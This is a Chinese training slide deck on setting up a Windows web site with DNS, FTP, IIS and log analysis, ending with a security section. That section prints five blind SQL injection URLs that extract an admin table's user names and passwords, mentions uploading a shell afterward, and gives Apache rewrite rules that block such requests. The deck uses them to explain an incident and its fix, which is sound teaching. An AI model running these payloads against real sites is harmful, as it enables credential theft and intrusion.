版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
在windows上搭建web站點(diǎn)wp1998@
2011.7編輯pptWeb站點(diǎn)的基本概念網(wǎng)絡(luò)服務(wù)DNS、FTP、webserver、Database……網(wǎng)站安全操作系統(tǒng)、web服務(wù)、數(shù)據(jù)庫(kù)、應(yīng)用腳本……訪問(wèn)質(zhì)量web訪問(wèn)速度、服務(wù)在線率……編輯ppt一個(gè)基本完整的web站點(diǎn)WebAPPserverDNSserverFTPserverDatabaseserverMailserverWindow2003serverLinuxserverASP/PHP/JSP/ASP.netWeb站點(diǎn):DNS解析域名FTP上傳文件CPU/memoryFileIO質(zhì)量安全編輯ppt建立DNS服務(wù)DNS的基本原理什么是dns、解析原理在Windows上建立dns服務(wù)Windowsserver自帶的dns服務(wù)操作查詢和驗(yàn)證dnsNslookup、dig編輯pptDNS的基本原理DomainNameServer域名服務(wù)提供域名與IP的對(duì)應(yīng)關(guān)系->9由dns服務(wù)器提供分級(jí)查詢服務(wù)
INNS->WindowsDNSserver與bind編輯pptDNS的基本原理NS:NS:NS:S編輯ppt在windows2003s上建立dns服務(wù)編輯ppt查詢和驗(yàn)證DNS服務(wù)Nslookup用來(lái)查詢域名信息的工具nslookupServersettype=mxDig更加靈活和強(qiáng)大的dns查詢工具Dig@mxDig@mx
+trace編輯ppt建立ftp服務(wù)ftp傳輸簡(jiǎn)介使用Window上自帶的ftp服務(wù)使用開(kāi)源的FileZilla建立ftp服務(wù)編輯pptFTP服務(wù)簡(jiǎn)介FileTransferProtocol是用來(lái)文件傳輸?shù)囊环N標(biāo)準(zhǔn)協(xié)議使用TCP21和TCP20端口,21端口用于傳輸命令控制,20端口用于數(shù)據(jù)傳輸。主動(dòng)模式和被動(dòng)模式斷點(diǎn)續(xù)傳開(kāi)源ftp工具:FileZilla編輯ppt使用windows2003s自帶的ftp服務(wù)編輯ppt使用Filezillaserver建立ftp服務(wù)編輯ppt建立web服務(wù)Web服務(wù)器的原理利用IIS建立web服務(wù)web發(fā)布、支持動(dòng)態(tài)腳本(asp、php、)利用IIS實(shí)現(xiàn)虛擬主機(jī)虛擬主機(jī)Web日志的利用和分析webalizer、awstat編輯pptweb服務(wù)器的基本原理編輯ppt在windows2003s上安裝IIS編輯ppt利用IIS發(fā)布一個(gè)網(wǎng)站編輯ppt讓IIS支持php動(dòng)態(tài)腳本編輯ppt在一臺(tái)IIS上建立多個(gè)虛擬站點(diǎn)編輯pptIIS站點(diǎn)web日志的管理與分析為每個(gè)站點(diǎn)保存獨(dú)立的web日志每天一個(gè)日志獨(dú)立目錄,定期檢查web日志分析webalizer/awstat自動(dòng)生成分析報(bào)表編輯ppt在windows上自動(dòng)分析weblog安裝webalizerdownload/編輯配置文件webalizer.conf建立批處理文件分析日志@ECHOOFFsetnow=%date:~0,4%%date:~5,2%%date:~8,2%CALLC:\webalizer\webalizer.exeD:\logs\access_%now%.log加入自動(dòng)計(jì)劃編輯pptWeb站點(diǎn)安全Windows系統(tǒng)安全I(xiàn)IS的安全腳本安全問(wèn)題Sql-inject、XSS跨站攻擊數(shù)據(jù)備份編輯pptIIS的安全工具M(jìn)icrosoft官方提供的Urlscan/download/urlscan屏蔽不合理的web請(qǐng)求減輕sql-inject攻擊記錄符合規(guī)則的攻擊日志每個(gè)web站點(diǎn)和目錄使用獨(dú)立的用戶帳號(hào)不使用不安全的IIS組件編輯ppt一次sql-inject的過(guò)程more.php?id=1and(selectascii(substr(database(),2,1))
)<=256and1=1
第一步,它通過(guò)selectdatabase()來(lái)一個(gè)個(gè)獲取數(shù)據(jù)庫(kù)名中的字符,因?yàn)槲覀償?shù)據(jù)庫(kù)名是4個(gè)字符,很快可以得到。more.php?id=1and(selectlength(cast(count(*)aschar))frominformation_schema.columns
wheretable_name=0x61646d696eandtable_schema=0×63737879limit1)<=32and1=1
第二步,通過(guò)獲得的數(shù)據(jù)庫(kù)名,在得到表名之后(也是利用前一步方式)獲取admin表的字段數(shù)量
more.php?id=1and(selectascii(substr(column_name,1,1))from(select*from(select*frominformation_schema.columnswheretable_name=0x61646d696eandtable_schema=0×63737879orderby1limit0,1)torderby1desc)tlimit1)>108and1=1
第三步,通過(guò)數(shù)據(jù)庫(kù)和表名在mysql系統(tǒng)表里探測(cè)字段名稱more.php?id=1and(selectascii(substr(user_pwd,3,1))from(select*from(select*fromadminwhere1=1orderby1limit2,1)torderby1desc)tlimit1)>56and1=1
第四步,得到了字段名user_pwd后,仍用每字符ascii嗎的方式探測(cè)字段內(nèi)容more.php?id=1and(selectascii(substr(user_name,4,1))from(select*from(select*fromadminwhere1=1orderby1limit2,1)torderby1desc)tlimit1)>128and1=1
第五步,同上,探測(cè)user_name的字段內(nèi)容通過(guò)上面的幾個(gè)步驟基本可以拿到應(yīng)用程序中的賬號(hào)密碼,然后試圖進(jìn)入管理界面后通過(guò)uploadshell等方式進(jìn)一步得到系統(tǒng)權(quán)限。編輯ppt一次sql-inject的實(shí)際處理處理過(guò)程:1、分析web日志,根據(jù)被修改頁(yè)面URL追查入侵路徑2、鎖定存在sql-inject漏洞的腳本,向開(kāi)發(fā)人員提出修改意見(jiàn)3、在腳本中加強(qiáng)Get變量驗(yàn)證函數(shù),過(guò)濾非法變量?jī)?nèi)容;3、在webserver上添加rewrite規(guī)則,過(guò)濾特殊sql-inject字符的URL訪問(wèn)4、文件存檔、安全報(bào)告。我們?cè)贏pache中做的一些簡(jiǎn)單rewrite設(shè)置:RewriteEngineOn
RewriteBase/
RewriteCond%{QUERY_STRING}%20and%20[NC]
RewriteCond%{QUERY_STRING}select%20[NC]
RewriteRule^(.*)/519.html[R]URL變量中包含and和select的請(qǐng)求,全部定向到錯(cuò)誤提示頁(yè)面。編
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024年湖北省新華醫(yī)院中山分院高層次衛(wèi)技人才招聘筆試歷年參考題庫(kù)頻考點(diǎn)附帶答案
- 2024年07月浙江杭州銀行總行信息技術(shù)部招考筆試歷年參考題庫(kù)附帶答案詳解
- 2024深圳至巴黎空運(yùn)出口合同
- 第13課《野望》《錢塘湖春行》寫景抒情詩(shī)聯(lián)讀說(shuō)課稿2024-2025學(xué)年統(tǒng)編版語(yǔ)文八年級(jí)上冊(cè)
- 2024年07月江西華夏銀行南昌分行社會(huì)招考筆試歷年參考題庫(kù)附帶答案詳解
- 2024倉(cāng)庫(kù)消防培訓(xùn)
- 2024年澤庫(kù)縣藏醫(yī)院高層次衛(wèi)技人才招聘筆試歷年參考題庫(kù)頻考點(diǎn)附帶答案
- 大班流感預(yù)防
- 2024年沈陽(yáng)電纜廠職工醫(yī)院高層次衛(wèi)技人才招聘筆試歷年參考題庫(kù)頻考點(diǎn)附帶答案
- 2024版建筑工程裝飾材料買賣協(xié)議版B版
- 江蘇省鹽城市、南京市2024-2025學(xué)年度第一學(xué)期期末調(diào)研測(cè)試高三政治試題(含答案)
- 駕校教練安全培訓(xùn)課件
- 中央2024年住房和城鄉(xiāng)建設(shè)部信息中心招聘3人筆試歷年典型考點(diǎn)(頻考版試卷)附帶答案詳解
- ISO 56001-2024《創(chuàng)新管理體系-要求》專業(yè)解讀與應(yīng)用實(shí)踐指導(dǎo)材料之19:“7支持-7.2能力”(雷澤佳編制-2025B0)
- 2024秋新商務(wù)星球版地理7年級(jí)上冊(cè)教學(xué)課件 第5章 地球表層的人文環(huán)境要素 第4節(jié) 發(fā)展差異與區(qū)際聯(lián)系
- 2025學(xué)年人教新版英語(yǔ)七下Unit1隨堂小測(cè)
- 2024版教育培訓(xùn)機(jī)構(gòu)店面轉(zhuǎn)讓及課程合作協(xié)議3篇
- 《BL急性腎盂腎炎》課件
- 2024-2025學(xué)年上學(xué)期上海小學(xué)語(yǔ)文六年級(jí)期末模擬試卷
- 七年級(jí)上冊(cè)英語(yǔ)期末??甲魑姆段?0篇(含譯文)
- 2024-2025學(xué)年二年級(jí)數(shù)學(xué)上冊(cè)期末樂(lè)考非紙筆測(cè)試題(二 )(蘇教版)
評(píng)論
0/150
提交評(píng)論